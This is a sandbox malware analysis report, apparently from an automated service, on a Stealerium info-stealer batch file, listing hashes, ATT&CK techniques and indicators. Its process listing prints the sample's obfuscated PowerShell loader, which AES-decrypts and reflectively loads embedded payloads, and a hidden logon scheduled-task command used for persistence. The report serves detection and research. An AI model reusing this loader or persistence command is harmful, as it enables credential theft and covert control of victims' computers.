stealerium | c5b08c3dbec0b169f328c5935a415fd061090781f82bbaa89647dfefe592217a

Analysis

max time kernel
152s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
31-05-2024 21:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

iguad5s.bat
Size

2.3MB
MD5

4b2a4b79e27f6dcbd8b9bc440bbf5ed1
SHA1

d4cdd6ca2032e4bda033b45091934a43f54cac54
SHA256

c5b08c3dbec0b169f328c5935a415fd061090781f82bbaa89647dfefe592217a
SHA512

10e509f80cda74b7175bfbfbdf74c56b493cbe5d139d0049f9ff2a753012f9f358c6c623f697a6a39576f263dcb6e20acecb7d9d2bc56a6a9c1a68d8d79c920c
SSDEEP

24576:7305XtI7lKGo2D8bcuEabiqmX6V1kesz4Y5dN2Kt3d3k+g3EaWQlztNIgQHauJW6:7YXtZWLSi82/g3vTQH5vQ8D3

Score

10^/10

stealerium execution stealer

Malware Config

Signatures

Stealerium
An open source info stealer written in C# first seen in May 2022.
stealer stealerium
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2256 powershell.exe
1016 powershell.exe
3964 powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 11 IoCs

Processes:

svchost.exesvchost.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1368 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

624 taskkill.exe

pid	process
1368	timeout.exe

pid	process
624	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02mtpqbfglomtlue	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02yunhgkrcfcytdr\Provision Friday, May 31, 2024 21:09:52 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAAAWt4pSXe1btP+NoJvUmvGybCrgm+jUgqYkAGQJmyR7/gAAAAAOgAAAAAIAACAAAADIxBNVOpdTeSm/NR1K01acGpR9ZGlfDRxMZGwqKKVquyAAAADR5UBthlvpTGh4Iwd19tkX73PovnShTpucg4JjHgaLYEAAAADV3YoF1yap47WMWXg+9F8ugN4xJ8cPyL97HiAfCVcIRsLP27osqedrBBrObiTVLkpM/LgYRe7/jrUghJR4xoPw"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02mgoezfaeebtltb	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02mgoezfaeebtltb\Provision Friday, May 31, 2024 21:09:52 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAACQAnMS78AU4wzZOn0ARcl/VwwNXTDJF77wuYmod94t+wAAAAAOgAAAAAIAACAAAAAgd8mJjiRADIyVahZ/An6Ubcl4DP2U5huwHwILHj6+qyAAAAA2s9TYfAKOfhdXjnpofUzvJ/+CdHiuE/DBd3lg25i4BEAAAAAU28vJiNbdWK5l5VvCO1xETtue1Ar3+u34TBP1CkAvkKfrdXwnuFOhxCUYc8ake5/ANF/3OTun695yKjDOfKDy"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bibcnjrnjcqqqt\Provision Friday, May 31, 2024 21:09:49 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAAA5l/ftTPsrvRVSF9azCDfxGYz9OvFaeVjQKSDJNTtUZAAAAAAOgAAAAAIAACAAAAByU094R7iEo8/Px1dC1UZFAr1icc4Y1NXLhx0OwVbI5yAAAADR4+7mGEIoggzUSIriyf8bpAMZPOtFDUcPJBSDXiR9CUAAAADjekMmieCdSBky+hKCzM+ZcOdBxH0I8RHtWerAPNP/kYUHRZGhHjSCdTfqZpB6P5fS36Br0I9KkycGsgKw3t64"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02mtpqbfglomtlue\Provision Friday, May 31, 2024 21:09:50 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAACSVbDoFq0zKx0k3Ikyo/n1Ncu/Eh0meylNcjEq16TtVAAAAAAOgAAAAAIAACAAAABS/FBThBaDh6b0R2kftbeUS+++aGVKzuPJW8c7dqU3SCAAAAAewx7vbFcH9OkgsyXeQA7KEErtAPeW7DIFD6mY6oTAIUAAAADiZTAXUUMRsKFDYWEFtzEVUZGPBFrnojsG6P+QSNjAKUsTR2zADs0ik0NPVObf4x6hy0Vk1Yu5ADEMQ5d3VqNO"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hpeesafqpsnxqz	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02vxzkeqntgbfhod	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bibcnjrnjcqqqt	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02vxzkeqntgbfhod\Provision Friday, May 31, 2024 21:09:50 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAAAiNscBFM0TtlJfZ+TAxmBmfqSUkD+C683J74IyIWAlNgAAAAAOgAAAAAIAACAAAAB4BLRSJN14yk4g3/0AkM7tYshnWWkMI9tP4OU7PmOUlSAAAAC5wYEE9G3hWS5cpIpHO72PvIo19dpbVWSpllVuLFsAM0AAAAC/J72dhwr/mkLn/tV93CSPpjHGPtF3YURPHIkDT2I/Dohlqg2wJBpnxpQNtrqeIUAlrZvDgjtNqW9iW9WpLlmU"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02yunhgkrcfcytdr	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hpeesafqpsnxqz\Provision Friday, May 31, 2024 21:09:49 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAOJ8ZVWhMl0eDznUHpdkMqgAAAAACAAAAAAAQZgAAAAEAACAAAADR4vn74EXqZrxUSj4yHLSAq/DFs8gfiWDDk1H5YLej/QAAAAAOgAAAAAIAACAAAABjKnUfFphbXSWmHxUOgBl2kap87QtQ1gZwukFooyQjuCAAAAAVrpgtFrRVppOqDKRhA1nCKU0l7ftCyMUZ+0YkvZlX4EAAAAAcobEHcNv0zcJF7gDO2M1XgpWjWKIlsbcZaTvOVoNEcjV5JHmV2eiRs8Ow/K+eqEtYw+J3XQhDMUH97U4HWBig"	svchost.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2256	powershell.exe
2256	powershell.exe
1016	powershell.exe
1016	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeIncreaseQuotaPrivilege	1016	powershell.exe
Token: SeSecurityPrivilege	1016	powershell.exe
Token: SeTakeOwnershipPrivilege	1016	powershell.exe
Token: SeLoadDriverPrivilege	1016	powershell.exe
Token: SeSystemProfilePrivilege	1016	powershell.exe
Token: SeSystemtimePrivilege	1016	powershell.exe
Token: SeProfSingleProcessPrivilege	1016	powershell.exe
Token: SeIncBasePriorityPrivilege	1016	powershell.exe
Token: SeCreatePagefilePrivilege	1016	powershell.exe
Token: SeBackupPrivilege	1016	powershell.exe
Token: SeRestorePrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeSystemEnvironmentPrivilege	1016	powershell.exe
Token: SeRemoteShutdownPrivilege	1016	powershell.exe
Token: SeUndockPrivilege	1016	powershell.exe
Token: SeManageVolumePrivilege	1016	powershell.exe
Token: 33	1016	powershell.exe
Token: 34	1016	powershell.exe
Token: 35	1016	powershell.exe
Token: 36	1016	powershell.exe
Token: SeIncreaseQuotaPrivilege	1016	powershell.exe
Token: SeSecurityPrivilege	1016	powershell.exe
Token: SeTakeOwnershipPrivilege	1016	powershell.exe
Token: SeLoadDriverPrivilege	1016	powershell.exe
Token: SeSystemProfilePrivilege	1016	powershell.exe
Token: SeSystemtimePrivilege	1016	powershell.exe
Token: SeProfSingleProcessPrivilege	1016	powershell.exe
Token: SeIncBasePriorityPrivilege	1016	powershell.exe
Token: SeCreatePagefilePrivilege	1016	powershell.exe
Token: SeBackupPrivilege	1016	powershell.exe
Token: SeRestorePrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeSystemEnvironmentPrivilege	1016	powershell.exe
Token: SeRemoteShutdownPrivilege	1016	powershell.exe
Token: SeUndockPrivilege	1016	powershell.exe
Token: SeManageVolumePrivilege	1016	powershell.exe
Token: 33	1016	powershell.exe
Token: 34	1016	powershell.exe
Token: 35	1016	powershell.exe
Token: 36	1016	powershell.exe
Token: SeIncreaseQuotaPrivilege	1016	powershell.exe
Token: SeSecurityPrivilege	1016	powershell.exe
Token: SeTakeOwnershipPrivilege	1016	powershell.exe
Token: SeLoadDriverPrivilege	1016	powershell.exe
Token: SeSystemProfilePrivilege	1016	powershell.exe
Token: SeSystemtimePrivilege	1016	powershell.exe
Token: SeProfSingleProcessPrivilege	1016	powershell.exe
Token: SeIncBasePriorityPrivilege	1016	powershell.exe
Token: SeCreatePagefilePrivilege	1016	powershell.exe
Token: SeBackupPrivilege	1016	powershell.exe
Token: SeRestorePrivilege	1016	powershell.exe
Token: SeShutdownPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeSystemEnvironmentPrivilege	1016	powershell.exe
Token: SeRemoteShutdownPrivilege	1016	powershell.exe
Token: SeUndockPrivilege	1016	powershell.exe
Token: SeManageVolumePrivilege	1016	powershell.exe
Token: 33	1016	powershell.exe
Token: 34	1016	powershell.exe
Token: 35	1016	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 2236 wrote to memory of 1076	2236	cmd.exe	cmd.exe
PID 2236 wrote to memory of 1076	2236	cmd.exe	cmd.exe
PID 2236 wrote to memory of 2256	2236	cmd.exe	powershell.exe
PID 2236 wrote to memory of 2256	2236	cmd.exe	powershell.exe
PID 2256 wrote to memory of 1016	2256	powershell.exe	powershell.exe
PID 2256 wrote to memory of 1016	2256	powershell.exe	powershell.exe
PID 2256 wrote to memory of 3332	2256	powershell.exe	WScript.exe
PID 2256 wrote to memory of 3332	2256	powershell.exe	WScript.exe
PID 3332 wrote to memory of 5100	3332	WScript.exe	cmd.exe
PID 3332 wrote to memory of 5100	3332	WScript.exe	cmd.exe
PID 5100 wrote to memory of 2280	5100	cmd.exe	cmd.exe
PID 5100 wrote to memory of 2280	5100	cmd.exe	cmd.exe
PID 5100 wrote to memory of 3964	5100	cmd.exe	powershell.exe
PID 5100 wrote to memory of 3964	5100	cmd.exe	powershell.exe
PID 3964 wrote to memory of 3164	3964	powershell.exe	Explorer.EXE
PID 3964 wrote to memory of 2952	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2360	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2556	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 780	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2548	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 380	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2152	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1556	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 956	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1348	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2724	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 548	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1068	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1924	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1328	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1720	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1916	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2108	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 924	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 3080	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 512	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1496	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 3460	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 896	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1484	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1284	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1676	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1476	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2652	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1468	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2644	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1852	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1932	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1056	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2628	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 3504	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1048	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1636	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1040	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2368	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1820	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2604	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1224	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2008	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2396	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1208	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 4912	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 1780	3964	powershell.exe	svchost.exe
PID 3964 wrote to memory of 2092	3964	powershell.exe	cmd.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1484

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1916

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3080

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\iguad5s.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8EHdakdQxWYXgKssWRzTX5hCNvNc8ivOG9FZTDqxhsQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fyI6585TT9BIJM4lP0k6xA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CFJSF=New-Object System.IO.MemoryStream(,$param_var); $YGSqT=New-Object System.IO.MemoryStream; $VCKjZ=New-Object System.IO.Compression.GZipStream($CFJSF, [IO.Compression.CompressionMode]::Decompress); $VCKjZ.CopyTo($YGSqT); $VCKjZ.Dispose(); $CFJSF.Dispose(); $YGSqT.Dispose(); $YGSqT.ToArray();}function execute_function($param_var,$param2_var){ $ypEOO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $znkTU=$ypEOO.EntryPoint; $znkTU.Invoke($null, $param2_var);}$UKDhL = 'C:\Users\Admin\AppData\Local\Temp\iguad5s.bat';$host.UI.RawUI.WindowTitle = $UKDhL;$sqWUv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UKDhL).Split([Environment]::NewLine);foreach ($xqQna in $sqWUv) { if ($xqQna.StartsWith('CiMFOfpQzkDfIljjLxoO')) { $ooNpe=$xqQna.Substring(20); break; }}$payloads_var=[string[]]$ooNpe.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:1076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_599_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8EHdakdQxWYXgKssWRzTX5hCNvNc8ivOG9FZTDqxhsQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fyI6585TT9BIJM4lP0k6xA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CFJSF=New-Object System.IO.MemoryStream(,$param_var); $YGSqT=New-Object System.IO.MemoryStream; $VCKjZ=New-Object System.IO.Compression.GZipStream($CFJSF, [IO.Compression.CompressionMode]::Decompress); $VCKjZ.CopyTo($YGSqT); $VCKjZ.Dispose(); $CFJSF.Dispose(); $YGSqT.Dispose(); $YGSqT.ToArray();}function execute_function($param_var,$param2_var){ $ypEOO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $znkTU=$ypEOO.EntryPoint; $znkTU.Invoke($null, $param2_var);}$UKDhL = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat';$host.UI.RawUI.WindowTitle = $UKDhL;$sqWUv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UKDhL).Split([Environment]::NewLine);foreach ($xqQna in $sqWUv) { if ($xqQna.StartsWith('CiMFOfpQzkDfIljjLxoO')) { $ooNpe=$xqQna.Substring(20); break; 